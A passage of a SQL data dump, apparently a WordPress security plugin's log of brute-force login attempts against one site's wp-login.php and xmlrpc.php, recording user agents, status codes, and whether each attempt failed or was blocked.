Firefox/62.0','loginFailValidUsername',NULL,NULL),(7032,0.000000,1629618419.005911,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','loginFailValidUsername',NULL,NULL),(7033,0.000000,1629618449.380797,'\0\0\0\0\0\0\0\0\0\0��E��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7034,0.000000,1629618692.379807,'\0\0\0\0\0\0\0\0\0\0��H�.�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7035,0.000000,1629619217.907460,'\0\0\0\0\0\0\0\0\0\0��>��G',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7036,0.000000,1629619518.104548,'\0\0\0\0\0\0\0\0\0\0���Z�&',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7037,0.000000,1629620613.764509,'\0\0\0\0\0\0\0\0\0\0��/�\'',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7038,0.000000,1629621717.146550,'\0\0\0\0\0\0\0\0\0\0��_��[',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7039,0.000000,1629622031.683787,'\0\0\0\0\0\0\0\0\0\0����\n',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7040,0.000000,1629622838.007003,'\0\0\0\0\0\0\0\0\0\0���75�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7041,0.000000,1629623972.111852,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','loginFailValidUsername',NULL,NULL),(7042,0.000000,1629625110.671809,'\0\0\0\0\0\0\0\0\0\0��\"]$d',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7043,0.000000,1629625555.224202,'\0\0\0\0\0\0\0\0\0\0����\n',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7044,0.000000,1629626241.111273,'\0\0\0\0\0\0\0\0\0\0��-(��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','loginFailValidUsername',NULL,NULL),(7045,0.000000,1629628539.206097,'\0\0\0\0\0\0\0\0\0\0����\n',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','loginFailValidUsername',NULL,NULL),(7046,0.000000,1629629286.510679,'\0\0\0\0\0\0\0\0\0\0����q',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7047,0.000000,1629629699.791504,'\0\0\0\0\0\0\0\0\0\0���㪽',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailValidUsername',NULL,NULL),(7048,0.000000,1629630850.369871,'\0\0\0\0\0\0\0\0\0\0���]�S',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(7049,0.000000,1629632015.195742,'\0\0\0\0\0\0\0\0\0\0��gm',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7050,0.000000,1629633177.702746,'\0\0\0\0\0\0\0\0\0\0��4��~',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7051,0.000000,1629633219.917378,'\0\0\0\0\0\0\0\0\0\0���츈',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7052,0.000000,1629634560.060395,'\0\0\0\0\0\0\0\0\0\0��6%',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7053,0.000000,1629635356.845713,'\0\0\0\0\0\0\0\0\0\0��2M_',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7054,0.000000,1629635528.180766,'\0\0\0\0\0\0\0\0\0\0���A��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7055,0.000000,1629636086.818175,'\0\0\0\0\0\0\0\0\0\0����O',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7056,0.000000,1629636707.213757,'\0\0\0\0\0\0\0\0\0\0���F��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7057,0.000000,1629636765.374957,'\0\0\0\0\0\0\0\0\0\0��B�|',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7058,0.000000,1629637481.463179,'\0\0\0\0\0\0\0\0\0\0��g�t2',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7059,0.000000,1629637885.477376,'\0\0\0\0\0\0\0\0\0\0���)z�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7060,0.000000,1629638234.174944,'\0\0\0\0\0\0\0\0\0\0��]��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7061,0.000000,1629638999.588337,'\0\0\0\0\0\0\0\0\0\0��@o~Q',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7062,0.000000,1629639061.555406,'\0\0\0\0\0\0\0\0\0\0���!',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36','loginFailValidUsername',NULL,NULL),(7063,0.000000,1629639722.939119,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7064,0.000000,1629640313.592581,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7065,0.000000,1629640860.473468,'\0\0\0\0\0\0\0\0\0\0��m��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7066,0.000000,1629641841.914747,'\0\0\0\0\0\0\0\0\0\0��Օg�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7067,0.000000,1629642208.936291,'\0\0\0\0\0\0\0\0\0\0��h�x',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7068,0.000000,1629642599.386269,'\0\0\0\0\0\0\0\0\0\0��>�F�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7069,0.000000,1629642602.441500,'\0\0\0\0\0\0\0\0\0\0��g���',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','loginFailValidUsername',NULL,NULL),(7070,0.000000,1629642972.952697,'\0\0\0\0\0\0\0\0\0\0����jQ',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7071,0.000000,1629643300.701208,'\0\0\0\0\0\0\0\0\0\0��\rQ(',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7072,0.000000,1629643643.222248,'\0\0\0\0\0\0\0\0\0\0��ϔK',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7073,0.000000,1629643963.246966,'\0\0\0\0\0\0\0\0\0\0��\ru3',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7074,0.000000,1629644270.707941,'\0\0\0\0\0\0\0\0\0\0���_nq',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7075,0.000000,1629644638.611117,'\0\0\0\0\0\0\0\0\0\0��e�8',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(7076,0.000000,1629644959.808755,'\0\0\0\0\0\0\0\0\0\0���~߱',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','loginFailValidUsername',NULL,NULL),(7077,0.000000,1629646137.240434,'\0\0\0\0\0\0\0\0\0\0��vE��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7078,0.000000,1629647320.769980,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7079,0.000000,1629648503.155741,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','loginFailValidUsername',NULL,NULL),(7080,0.000000,1629649689.331275,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','loginFailValidUsername',NULL,NULL),(7081,0.000000,1629651651.366463,'\0\0\0\0\0\0\0\0\0\0���(%�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7082,0.000000,1629652499.209108,'\0\0\0\0\0\0\0\0\0\0���Qӈ',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7083,0.000000,1629653417.534826,'\0\0\0\0\0\0\0\0\0\0����s�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7084,0.000000,1629654349.842218,'\0\0\0\0\0\0\0\0\0\0���Z�&',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7085,0.000000,1629655284.905298,'\0\0\0\0\0\0\0\0\0\0���E\"�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7086,0.000000,1629656208.726544,'\0\0\0\0\0\0\0\0\0\0��#��C',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','loginFailValidUsername',NULL,NULL),(7087,0.000000,1629657122.344975,'\0\0\0\0\0\0\0\0\0\0��C�=�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7088,0.000000,1629658036.883396,'\0\0\0\0\0\0\0\0\0\0����m',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7089,0.000000,1629658947.759888,'\0\0\0\0\0\0\0\0\0\0��D��U',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7090,0.000000,1629659856.217028,'\0\0\0\0\0\0\0\0\0\0��tK�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7091,0.000000,1629660754.449554,'\0\0\0\0\0\0\0\0\0\0��gZ��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7092,0.000000,1629661591.337672,'\0\0\0\0\0\0\0\0\0\0��r!Z',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7093,0.000000,1629664077.362571,'\0\0\0\0\0\0\0\0\0\0��%a��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7094,0.000000,1629664909.095100,'\0\0\0\0\0\0\0\0\0\0��t��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7095,0.000000,1629666639.989379,'\0\0\0\0\0\0\0\0\0\0��/���',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7096,0.000000,1629667506.173607,'\0\0\0\0\0\0\0\0\0\0���G',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','loginFailValidUsername',NULL,NULL),(7097,0.000000,1629667904.617828,'\0\0\0\0\0\0\0\0\0\0���1N',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7098,0.000000,1629668777.389505,'\0\0\0\0\0\0\0\0\0\0����gI',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7099,0.000000,1629669629.870522,'\0\0\0\0\0\0\0\0\0\0���;U�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7100,0.000000,1629670464.775208,'\0\0\0\0\0\0\0\0\0\0����T�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','loginFailValidUsername',NULL,NULL),(7101,0.000000,1629671305.121317,'\0\0\0\0\0\0\0\0\0\0���;v�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','loginFailValidUsername',NULL,NULL),(7102,0.000000,1629672145.782258,'\0\0\0\0\0\0\0\0\0\0��QEˣ',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7103,0.000000,1629672987.318337,'\0\0\0\0\0\0\0\0\0\0��ʽ��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7104,0.000000,1629673837.136754,'\0\0\0\0\0\0\0\0\0\0��ܧe',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7105,0.000000,1629674683.695634,'\0\0\0\0\0\0\0\0\0\0���}7�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','loginFailValidUsername',NULL,NULL),(7106,0.000000,1629675540.076447,'\0\0\0\0\0\0\0\0\0\0��_կ�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7107,0.000000,1629676394.247748,'\0\0\0\0\0\0\0\0\0\0��C��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','loginFailValidUsername',NULL,NULL),(7108,0.000000,1629678105.610033,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7109,0.000000,1629678963.462057,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','loginFailValidUsername',NULL,NULL),(7110,0.000000,1629679834.868067,'\0\0\0\0\0\0\0\0\0\0��_�� ',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','loginFailValidUsername',NULL,NULL),(7111,0.000000,1629680702.290357,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7112,0.000000,1629681582.557206,'\0\0\0\0\0\0\0\0\0\0���3',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7113,0.000000,1629682449.128877,'\0\0\0\0\0\0\0\0\0\0���cr5',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7114,0.000000,1629685056.194841,'\0\0\0\0\0\0\0\0\0\0��QEˣ',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7115,0.000000,1629685920.276769,'\0\0\0\0\0\0\0\0\0\0���^�M',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7116,0.000000,1629686761.383554,'\0\0\0\0\0\0\0\0\0\0��g1?',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7117,0.000000,1629687594.312389,'\0\0\0\0\0\0\0\0\0\0���(%�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','loginFailValidUsername',NULL,NULL),(7118,0.000000,1629688441.018585,'\0\0\0\0\0\0\0\0\0\0���Z�_',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7119,0.000000,1629689279.915713,'\0\0\0\0\0\0\0\0\0\0�����^',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7120,0.000000,1629690102.696101,'\0\0\0\0\0\0\0\0\0\0��\"�1�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security 